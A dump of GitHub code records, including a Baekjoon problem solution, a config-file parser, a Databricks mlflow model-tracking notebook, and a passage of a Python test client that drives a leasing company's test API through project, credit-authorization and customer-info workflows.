+{"seq_id":"11554484754","text":"# https://www.acmicpc.net/problem/5622\n\ncheck_list = []\n\nfor i in range(3, 11):\n if i == 8 or i == 10:\n for j in range(4):\n check_list.append(i)\n else:\n for j in range(3):\n check_list.append(i)\n\ninput_str = input()\n\nresult_int = 0\n\nfor i in input_str:\n result_int += check_list[ord(i) - 
65]\n\nprint(result_int)","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_5622.py","file_name":"baekjoon_5622.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9299745647","text":"import os\n\n\nclass SyntaxError(Exception):\n def __init__(self, path, line, msg):\n super().__init__('Syntax error in {}:{}: {}'.format(\n path, line, msg))\n\n\nclass ConfigurationError(Exception):\n pass\n\n\nclass MissingError(ConfigurationError):\n def __init__(self, name):\n super().__init__('Missing required property `{}`.'.format(name))\n\n\nclass TypeError(ConfigurationError):\n def __init__(self, name, value, exp_type):\n msg = 'Property `{}` expected to be {} type but {} found.'.format(\n name, exp_type.__name__, type(value))\n super().__init__(msg)\n\n\nclass Config(dict):\n def __init__(self, path):\n super().__init__()\n self.path = path\n\n\ndef get(config, name, prop_type, default=None):\n if name not in config:\n return default\n if type(config[name]) is not prop_type:\n raise TypeError(name, config[name], prop_type)\n\n return config[name]\n\n\ndef get_required(config, name, prop_type):\n v = get(config, name, prop_type)\n if v == None:\n raise MissingError(name)\n\n return v\n\n\ndef isstr(s):\n if len(s) < 3:\n return False\n\n if not (s.startswith('\"') and s.endswith('\"')\n or s.startswith(\"'\") and s.endswith(\"'\")):\n return False\n\n return True\n\n\ndef isnum(s):\n return s.isnumeric()\n\n\ndef isbool(s):\n return s == 'true' or s == 'false'\n\n\ndef parse(path):\n config = Config(path)\n lineno = 0\n with open(path, 'r') as f:\n for l in f:\n lineno += 1\n l = l.strip()\n if not l:\n continue\n if l.startswith('#'):\n continue\n\n pts = l.split('=', 1)\n if len(pts) != 2:\n msg = 'Invalid line syntax. key=value format expected.'\n raise SyntaxError(path, lineno, msg)\n\n n, v = pts\n n = n.strip()\n v = v.strip()\n\n if isstr(v):\n config[n] = v[1:-1]\n elif isnum(v):\n config[n] = int(v)\n elif isbool(v):\n if v == 'true':\n config[n] = True\n elif v == 'false':\n config[n] = False\n else:\n raise AssertionError('Must not happen.')\n else:\n msg = ('Invalid value format. String, '\n 'integer and boolean are supported.')\n raise SyntaxError(path, lineno, msg)\n\n return config\n\n\n# TODO: Add configuration name based on conf-file to support\n# multiple instances of the single module.\ndef load_configs(path):\n configs = []\n\n for f in os.listdir(path):\n if f.endswith('.conf'):\n configs.append(parse(os.path.join(path, f)))\n\n return configs\n","repo_name":"vchimishuk/pud","sub_path":"pud/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73537340009","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC\n# MAGIC # 02 Model Development with *`mlflow`*\n# MAGIC\n# MAGIC In this notebook, we will see how a typical model development works using `mlflow`. `mlflow` is a facility provided by default in a databricks environment. 
\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Problem\n# MAGIC We will use `california_housing` dataset to train models that can predict whether a given house is in top 25% most expensive houses.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Preparations\n\n# COMMAND ----------\n\n# change 1 : we need to import mlflow\nimport mlflow\n\nimport yaml \n\nimport pandas as pd\n\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn import model_selection\nfrom sklearn import linear_model, ensemble\n\n# COMMAND ----------\n\ndf_X, ds_y = datasets.fetch_california_housing(return_X_y=True, as_frame=True)\n\nX_tr, X_ts, y_tr, y_ts = model_selection.train_test_split(df_X, ds_y, test_size=0.2, random_state=42)\npercentile_75 = y_tr.describe()[\"75%\"]\n\ny_tr_label = y_tr >= percentile_75\ny_ts_label = y_ts >= percentile_75\n\n# COMMAND ----------\n\nparam_log_reg = {\"loss\": \"log_loss\", \"penalty\": \"elasticnet\"}\nparam_svm = {\"loss\": \"hinge\", \"penalty\": \"elasticnet\"}\n\nmodel_log_reg = linear_model.SGDClassifier(**param_log_reg)\nmodel_svm = linear_model.SGDClassifier(**param_svm)\n\nparam_fast_large = {\"n_estimators\": 100, \"learning_rate\": 0.15}\nparam_slow_small = {\"n_estimators\": 80, \"learning_rate\": 0.1}\n\nmodel_fast_large = ensemble.GradientBoostingClassifier(**param_fast_large)\nmodel_slow_small = ensemble.GradientBoostingClassifier(**param_slow_small)\n\n# COMMAND ----------\n\ndef train_and_test_with_mlflow(model, run_name, tr_X = X_tr, tr_label = y_tr_label, ts_X = X_ts, ts_label = y_ts_label):\n # change 2 : use mlflow.start_run context manager\n with mlflow.start_run(run_name=run_name):\n model.fit(tr_X, tr_label)\n y_pred = model.predict(ts_X)\n # change 3 : log the metrics (instead of or in addition to print)\n mlflow.log_metric(key=\"precision\", value=metrics.precision_score(ts_label, y_pred))\n # print (f\"Precision : {metrics.precision_score(ts_label, y_pred)}\")\n mlflow.log_metric(key=\"recall\", value=metrics.recall_score(ts_label, y_pred))\n # print (f\"Recall : {metrics.recall_score(ts_label, y_pred)}\")\n mlflow.log_metric(key=\"f1\", value=metrics.f1_score(ts_label, y_pred))\n # print (f\"f1 score : {metrics.f1_score(ts_label, y_pred)}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Training and Testing\n\n# COMMAND ----------\n\ntrain_and_test_with_mlflow(model_log_reg, \"log_reg\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC **More than just metrics**\n# MAGIC\n# MAGIC Actually, `mlflow` can help us track parameters, datasets, and model artifacts in addition to just metrics.\n\n# COMMAND ----------\n\nconda_env = mlflow.sklearn.get_default_conda_env(include_cloudpickle=True)\nwith open(\"../configurations/conda_env.yaml\", \"wt\") as f:\n yaml.dump(conda_env, f)\n\n# COMMAND ----------\n\ndef train_and_test_with_mlflow(model, run_name, params, tr_X = X_tr, tr_label = y_tr_label, ts_X = X_ts, ts_label = y_ts_label):\n # change 2 : use mlflow.start_run context manager\n with mlflow.start_run(run_name=run_name) as run:\n # change 3.2 : log the parameters\n mlflow.log_params(params)\n\n # change 3.3 log the training dataset\n mlflow.log_input(mlflow.data.from_pandas(tr_X), context=\"training-X\")\n mlflow.log_input(mlflow.data.from_numpy(tr_label.to_numpy()), context=\"training-y\")\n\n model.fit(tr_X, tr_label)\n y_pred = model.predict(ts_X)\n # change 3.1 : log the metrics\n mlflow.log_metrics({\n \"precision\" : metrics.precision_score(ts_label, y_pred),\n \"recall\" : 
metrics.recall_score(ts_label, y_pred),\n \"f1\" : metrics.f1_score(ts_label, y_pred)\n })\n \n # change 3.4 : log the model itself\n mlflow.sklearn.log_model(\n model, run_name,\n conda_env=\"../configurations/conda_env.yaml\",\n signature=mlflow.models.infer_signature(tr_X, y_pred)\n )\n\n # change 4 : record the run_id\n run_id = run.info.run_id\n return run_id\n\n# COMMAND ----------\n\nrun_id_log_reg = train_and_test_with_mlflow(model_log_reg, run_name=\"log_reg_2\", params=param_log_reg)\n\n# COMMAND ----------\n\nrun_id_svm = train_and_test_with_mlflow(model_svm, run_name=\"svm\", params=param_svm)\n\n# COMMAND ----------\n\nrun_id_gbm_fast_large = train_and_test_with_mlflow(model_fast_large, run_name=\"gbm_fast_large\", params=param_fast_large)\n\n# COMMAND ----------\n\nrun_id_gbm_slow_small = train_and_test_with_mlflow(model_slow_small, run_name=\"gbm_slow_small\", params=param_slow_small)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC **Even how metrics progresses**\n# MAGIC\n# MAGIC In the example below, we will illustrate how `mlflow` can be used to track progression of metrics.\n\n# COMMAND ----------\n\nfrom sklearn import neural_network\n\nnet = neural_network.MLPClassifier(\n hidden_layer_sizes=(20, 20), \n max_iter=25,\n warm_start=True\n)\n\nwarm_start=False\n\nwith mlflow.start_run(run_name=\"neural_network\"):\n for i in range(0, 10):\n net.fit(X_tr, y_tr_label)\n y_pred = net.predict(X_ts)\n mlflow.log_metrics({\n \"precision\" : metrics.precision_score(y_ts_label, y_pred),\n \"recall\" : metrics.recall_score(y_ts_label, y_pred),\n \"f1\" : metrics.f1_score(y_ts_label, y_pred)\n }, step=net.n_iter_)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Log the `run_id`\n# MAGIC\n# MAGIC Now, let us log the run_ids for cases when we want to register and serve one of these models.\n\n# COMMAND ----------\n\nwith open(\"../configurations/run_ids.yaml\", \"wt\") as f:\n yaml.dump({\n \"run_id\" : {\n \"gbm_fast_large\": run_id_gbm_fast_large,\n \"gbm_slow_small\": run_id_gbm_slow_small,\n \"log_reg\": run_id_log_reg,\n \"svm\": run_id_svm\n }\n }, f)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC > Do not worry if you miss this step, run_ids are also accessible from databricks UI.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Summary\n# MAGIC\n# MAGIC We learnt that tracking the models, (training) parameters and (test) performance as well as datasets using **`mlflow`** is easy and straightforward. It reduces errors and is less cumbersome. Finally, it facilitates recording of experiments with minimum changes to workflows. 
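# COMMAND ----------

# MAGIC %md
# MAGIC
# MAGIC As a quick sanity check (not part of the original walkthrough), a logged model can be reloaded straight from its run. A minimal sketch, assuming the `run_id_log_reg` and artifact name `log_reg_2` recorded above:

# COMMAND ----------

# Reload the sklearn model logged with mlflow.sklearn.log_model;
# "runs:/<run_id>/<artifact_path>" is the standard mlflow artifact URI.
reloaded_model = mlflow.sklearn.load_model(f"runs:/{run_id_log_reg}/log_reg_2")
print(metrics.f1_score(y_ts_label, reloaded_model.predict(X_ts)))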
\n\n# COMMAND ----------\n\n\n","repo_name":"neolaw84/databricks-sandbox","sub_path":"train/02_model_development_with_mlflow.py","file_name":"02_model_development_with_mlflow.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1534915319","text":"from urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom Z500.tools import test_data\nfrom Z500.common.login import login\nfrom Z500.models import Test\nfrom Z500.models import Sys_param_config\nfrom Z500.models import Auth_group\nfrom Z500.tools.dingtalk import send_notify\n\n\n\nimport time\nimport requests\nimport jsonpath\nimport datetime\n\n\nclass xiaoWeiNew():\n\n def __init__(self, headers):\n self.headers = headers\n self.url = 'https://test-vrip.msfl.com.cn/'\n self.req = requests.session()\n\n def api(self,**kwargs):\n\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n url = self.url +kwargs.get(\"url\")\n kwargs.pop(\"url\")\n self.req.mount('http://', HTTPAdapter(max_retries=retries))\n self.req.mount('https://', HTTPAdapter(max_retries=retries))\n\n try:\n res = self.req.request(url =url, verify=False, headers=self.headers, **kwargs).json()\n print(url,res)\n return res\n except Exception as e:\n print(\"发生异常:\", str(e))\n time.sleep(30)\n res = self.req.request(url=url, verify=False, headers=self.headers, **kwargs).json()\n print(url, res)\n return res\n\n def updateHeader(self,custName):\n res = login(custName)\n headers = {\"AccessToken\": res[\"access_token\"]}\n self.headers = headers\n\n def add_pro(self,lesaseName):\n '''新建项目'''\n url = 'ifc/api/credit-auth/createProj?leaseName=%s' % lesaseName\n res = self.api(method=\"GET\", url=url)\n return res\n\n def pro_page(self):\n url = 'ifc/api/credit-auth/project/page'\n data = {\n \"current\": 1,\n \"size\": 20,\n \"leaseName\": \"\",\n \"statusCode\": \"000000\"\n }\n res = self.api(method =\"POST\", url=url, json = data)\n return res\n\n def preQuery(self,projectNo):\n '''预审初始化'''\n url = 'ifc/api/pre-approval/init?projectNo=%s'%projectNo\n res = self.api(method = \"GET\", url = url)\n return res\n\n def getPro(self,projectNo):\n url = 'ifc/api/credit-auth/project/query/detail?projectNo=%s'%projectNo\n res = self.api(method =\"GET\", url=url)\n return res\n\n def creditAuthSave(self,projectNo,custName,guarantor):\n '''创建征信授权'''\n url = 'https://test-asp.msfl.com.cn/asp/ifc/notice/credit-auth/save'\n\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n req =requests.session()\n req.mount('http://', HTTPAdapter(max_retries=retries))\n req.mount('https://', HTTPAdapter(max_retries=retries))\n\n data = test_data.getAuthData(projectNo,custName,guarantor)\n for i in data:\n try:\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n time.sleep(1)\n except:\n time.sleep(30)\n res = req.request(method='POST', url=url, json=i, verify=False, headers=self.headers)\n time.sleep(1)\n\n def creditAuthBack(self,projectNo,custName,guarantor):\n '''征信授权完成'''\n url = 'https://test-asp.msfl.com.cn/asp/ifc/notice/credit-auth/signOffCallback'\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n req = requests.session()\n req.mount('http://', HTTPAdapter(max_retries=retries))\n req.mount('https://', HTTPAdapter(max_retries=retries))\n\n data = 
test_data.getBackData(projectNo,custName,guarantor)\n for i in data:\n try:\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n except:\n time.sleep(30)\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n\n\n def taskCompleteInit(self,taskid):\n '''初始化流程'''\n url = 'ifc/api/flow/task-complete/init?taskId=%s'%taskid\n res = self.api(method='GET', url=url)\n return res\n\n def proSubmit(self,projectNo,guarantor):\n '''预审提交'''\n url = 'ifc/api/pre-approval/submit'\n res_query = self.preQuery(projectNo)\n if guarantor == '1':\n data={\n \"projectNo\": projectNo,\n \"customerList\": [\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[0],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[0],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[0],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[0],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[0],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[0],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[0],\n \"roleType\": \"6\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[1],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[1],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[1],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[1],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[1],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[1],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[1],\n \"roleType\": \"1\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[2],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[2],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[2],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[2],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[2],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[2],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[2],\n \"roleType\": \"2\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[3],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[3],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[3],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[3],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[3],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[3],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[3],\n \"roleType\": \"3\"\n }\n ],\n \"productType\": \"LS-DFL\",\n \"productNo\": \"LeaseYXZ300\"\n }\n else:\n data = {\n \"projectNo\": projectNo,\n \"customerList\": [\n {\n \"id\": jsonpath.jsonpath(res_query, '$..id')[0],\n \"creditCustomerType\": jsonpath.jsonpath(res_query, '$..creditCustomerType')[0],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerTypeName')[0],\n \"creditCustomerName\": jsonpath.jsonpath(res_query, '$..creditCustomerName')[0],\n \"creditCustomerNo\": 
jsonpath.jsonpath(res_query, '$..creditCustomerNo')[0],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query, '$..creditCustomerIdType')[0],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerIdTypeName')[0],\n \"roleType\": \"6\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query, '$..id')[1],\n \"creditCustomerType\": jsonpath.jsonpath(res_query, '$..creditCustomerType')[1],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerTypeName')[1],\n \"creditCustomerName\": jsonpath.jsonpath(res_query, '$..creditCustomerName')[1],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query, '$..creditCustomerNo')[1],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query, '$..creditCustomerIdType')[1],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerIdTypeName')[1],\n \"roleType\": \"1\"\n }\n ],\n \"productType\": \"LS-DFL\",\n \"productNo\": \"LeaseYXZ300\"\n }\n\n res = self.api(method =\"POST\", url=url, json = data)\n return res_query\n\n def opinionSumit(self,taskId):\n res = self.taskCompleteInit(taskId)\n if not res[\"data\"][\"remind\"]:\n remind = '测试同意'\n else:\n remind = res[\"data\"][\"remind\"]\n '''提交审批意见'''\n url = 'ifc/api/flow/task-complete'\n data = {\n \"remind\": remind,\n \"taskId\": taskId\n }\n time.sleep(3)\n res = self.api(method = 'POST', url =url,json = data)\n\n def custEnterpriseQuery(self,projectNo):\n '''客户信息-承租人-查询'''\n url = 'ifc/api/proj_cust_enterprise_info/queryByCondition'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def custEnterpriseSave(self,projectNo):\n '''客户信息-承租人-保存'''\n res_query = self.custEnterpriseQuery(projectNo)\n url = 'ifc/api/proj_cust_enterprise_info/save'\n data = {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..sourceId')[0],\n \"projectCustomerInfoId\": jsonpath.jsonpath(res_query,'$..projectCustomerInfoId')[0],\n \"roleType\": jsonpath.jsonpath(res_query,'$..roleType')[0],\n \"name\": jsonpath.jsonpath(res_query,'$..name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..idCardNo')[0],\n \"phoneNumber\": jsonpath.jsonpath(res_query,'$..phoneNumber')[0],\n \"country\": \"156\",\n \"countryName\": \"中国\",\n \"interIndustryClassifyOne\": \"A\",\n \"interIndustryClassifyTwo\": \"A01\",\n \"interIndustryClassifyThree\": \"A011\",\n \"interIndustryClassifyFour\": \"A0111\",\n \"interIndustryClassifyOneName\": \"农、林、牧、渔业\",\n \"interIndustryClassifyTwoName\": \"农业\",\n \"interIndustryClassifyThreeName\": \"谷物种植\",\n \"interIndustryClassifyFourName\": \"稻谷种植\",\n \"industryClassifyOne\": \"A\",\n \"industryClassifyTwo\": \"A01\",\n \"industryClassifyOneName\": \"机加\",\n \"industryClassifyTwoName\": \"机械加工\",\n \"registrationProvince\": \"110000\",\n \"registrationCity\": \"110100\",\n \"registrationRegion\": \"110101\",\n \"registrationProvinceName\": \"北京市\",\n \"registrationCityName\": \"市辖区\",\n \"registrationRegionName\": \"东城区\",\n \"registrationAddress\": \"上海\",\n \"officeProvince\": \"110000\",\n \"officeCity\": \"110100\",\n \"officeLocation\": \"110101\",\n \"officeProvinceName\": \"北京市\",\n \"officeCityName\": \"市辖区\",\n \"officeLocationName\": \"东城区\",\n \"officeAddress\": \"上海\",\n \"actualBusinessProvince\": \"110000\",\n \"actualBusinessCity\": \"110100\",\n 
\"actualBusinessLocation\": \"110101\",\n \"actualBusinessProvinceName\": \"北京市\",\n \"actualBusinessCityName\": \"市辖区\",\n \"actualBusinessLocationName\": \"东城区\",\n \"actualBusinessAddress\": \"上海\",\n \"rentStockholderRelated\": False,\n \"rentRelated\": False,\n \"ruralUrbanSignage\": \"N\",\n \"ruralUrbanSignageName\": \"否\",\n \"projectSource\": \"01\",\n \"projectSourceName\": \"银行推荐\",\n \"licProjectInvestmentOne\": \"A\",\n \"licProjectInvestmentTwo\": \"A01\",\n \"licProjectInvestmentThree\": \"A011\",\n \"licProjectInvestmentFour\": \"A0111\",\n \"licProjectInvestmentOneName\": \"农、林、牧、渔业\",\n \"licProjectInvestmentTwoName\": \"农业\",\n \"licProjectInvestmentThreeName\": \"谷物种植\",\n \"licProjectInvestmentFourName\": \"稻谷种植\",\n \"businessScope\": \"测试\",\n \"mainBusinessProducts\": \"测试\",\n \"enterpriseSize\": \"LARGE\",\n \"enterpriseSizeName\": \"大型\",\n \"enterpriseType\": \"10\",\n \"enterpriseTypeName\": \"法人企业\",\n \"institutionRegistCertNumber\": None,\n \"financialInstitutionCode\": None,\n \"holdingType\": \"A\",\n \"holdingTypeName\": \"公有控股经济\",\n \"zhongzhengCode\": \"122\",\n \"currency\": \"CNY\",\n \"currencyName\": \"人民币\",\n \"registeredCapital\": \"1000.00\",\n \"paidinCapital\": \"1000.00\",\n \"capitalization\": \"1000.00\",\n \"revenue\": \"1000.00\",\n \"establishmentTime\": \"2023-07-19 00:00:00\",\n \"businessLicenseExpirationDate\": \"2025-07-19 00:00:00\",\n \"businessStatus\": \"01\",\n \"businessStatusName\": \"正常运营\",\n \"employeeNumber\": \"1000\",\n \"legalRepresentative\": jsonpath.jsonpath(res_query,'$..legalRepresentative')[0],\n \"legalRepresentativeMobile\": jsonpath.jsonpath(res_query,'$..legalRepresentativeMobile')[0],\n \"legalPersonPhone\": jsonpath.jsonpath(res_query,'$..legalPersonPhone')[0],\n \"actualController\": jsonpath.jsonpath(res_query,'$..actualController')[0],\n \"nationalEconomy\": \"A\",\n \"nationalEconomyName\": \"广义政府\",\n \"listedCompanyLogo\": \"A\",\n \"listedCompanyLogoName\": \"A股\",\n \"resolutionType\": jsonpath.jsonpath(res_query,'$..resolutionType')[0],\n \"resolutionTypeName\": jsonpath.jsonpath(res_query,'$..resolutionTypeName')[0],\n \"email\": \"123@163.com\",\n \"registration\": [\"110000\", \"110100\", \"110101\"],\n \"industryType\": [\"A\", \"A01\"],\n \"office\": [\"110000\", \"110100\", \"110101\"],\n \"actualBusiness\": [\"110000\", \"110100\", \"110101\"],\n \"internationalIndustryType\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n \"licProjectInvestment\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n \"shareholdingStructureList\": []\n }\n res = self.api(method = 'POST', url =url,json = data)\n\n def custEnterpriseRelatedQuery(self,projectNo):\n '''客户信息-关键人-查询'''\n url = 'ifc/api/proj_cust_enterprise_related_info/queryByCondition'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def creditQuery(self,projectNo):\n '''客户信息-受益人-查询'''\n url = 'ifc/api/credit-auth/queryList'\n data = {\n \"customerName\": \"\",\n \"projectNo\": projectNo,\n \"isUse\": 1,\n \"creditAuthStatus\": 1,\n \"creditCustomerType\": \"IND\"\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def custEnterpriseRelateSave(self,projectNo,guarantor):\n '''客户信息-关键人-保存'''\n res_query = self.custEnterpriseRelatedQuery(projectNo)\n res_credit =self.creditQuery(projectNo)\n url = 'ifc/api/proj_cust_enterprise_related_info/edit'\n if guarantor == '2':\n data = {\n \"projectNo\": projectNo,\n \"actualController\": {\n \"id\": 
jsonpath.jsonpath(res_query,'$..actualController.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..actualController.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..actualController.enterpriseInfoId')[0],\n \"roleType\": \"6\",\n \"resolutionType\": None,\n \"resolutionTypeName\":None,\n \"name\": jsonpath.jsonpath(res_query,'$..actualController.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..actualController.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..actualController.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..actualController.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..actualController.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..actualController.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": None,\n \"idCity\": \"110100\",\n \"idCityName\": None,\n \"idLocation\": \"110101\",\n \"idLocationName\": None,\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"legalRepresentative\": {\n \"id\": jsonpath.jsonpath(res_query,'$..legalRepresentative.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.enterpriseInfoId')[0],\n \"roleType\": \"4\",\n \"resolutionType\": None,\n \"resolutionTypeName\": None,\n \"name\": jsonpath.jsonpath(res_query,'$..legalRepresentative.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..legalRepresentative.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": None,\n \"idCity\": \"110100\",\n \"idCityName\": None,\n \"idLocation\": \"110101\",\n \"idLocationName\": None,\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"beneficiary\": {\n \"authId\": jsonpath.jsonpath(res_credit,'$..id')[0],\n \"name\": jsonpath.jsonpath(res_credit,'$..creditCustomerName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_credit,'$..creditCustomerNo')[0],\n \"idCardType\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdTypeName')[0],\n \"residenceAddress\": jsonpath.jsonpath(res_credit,'$..creditCustomerAddress')[0],\n \"idArray\": [\"110000\", \"110100\", \"110101\"],\n \"idProvince\": \"110000\",\n \"idCity\": \"110100\",\n \"idLocation\": \"110101\"\n },\n \"personalIds\": [],\n \"custEnterpriseIds\": [],\n \"personalInfoModels\":[],\n \"projCustEnterpriseVMList\":[]\n }\n elif guarantor == '1':\n data = {\n \"projectNo\": projectNo,\n \"actualController\": {\n \"id\": jsonpath.jsonpath(res_query,'$..actualController.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..actualController.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..actualController.enterpriseInfoId')[0],\n 
\"roleType\": \"6\",\n \"resolutionType\": None,\n \"name\": jsonpath.jsonpath(res_query,'$..actualController.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..actualController.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..actualController.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..actualController.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..actualController.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..actualController.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": \"北京市\",\n \"idCity\": \"110100\",\n \"idCityName\": \"市辖区\",\n \"idLocation\": \"110101\",\n \"idLocationName\": \"东城区\",\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"legalRepresentative\": {\n \"id\": jsonpath.jsonpath(res_query,'$..legalRepresentative.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.enterpriseInfoId')[0],\n \"roleType\": \"4\",\n \"resolutionType\": None,\n 